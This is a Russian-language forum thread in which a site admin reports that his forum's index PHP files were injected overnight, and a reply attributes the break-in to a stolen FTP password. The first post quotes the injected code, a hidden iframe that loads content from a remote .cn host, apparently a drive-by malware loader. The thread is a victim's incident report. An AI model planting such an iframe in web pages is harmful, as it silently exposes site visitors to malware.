Гадости от thelotmachine

Автор Anik, 07 июня 2009, 16:09:31

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Anik

Все индексные файлы форума (то есть файлы вида index*.php во всех подкаталогах) оказались сегодня ночью запороты таким вот видом: в их концовку вместо части кода была вставлена такая вот фишка (не жмите только в ссылку, плиз!!):

<iframe src="http://thelotmachine.cn:8080/ts/in.cgi?pepsi49" width=125 height=125
style="visibility: hidden"></iframe>


Убирал их вручную (хорошо на локале лежала копия). Народ, у кого еще такое и что делать будем?
Где искать дыру?

Anik

Нашел еще немножко информации:

Это вирус: HEUR/HTML.Malware
http://www.avira.com/en/threats/section/details/id_vir/3686/index.html


Приложил 4 файла: 2 запорченные этим трояном, и 2 чистых (для сравнения). Осторожно при просмотре - вдруг заразно, хотя, в архиве ТОЛЬКО ТЕКСТЫ.

crazyASD

Меняй пароль на FTP. У тебя его украли. Взлом не через скрипты был.
Сон разума порождает монстров
Wordpress - рулит!  SMF 2.0.11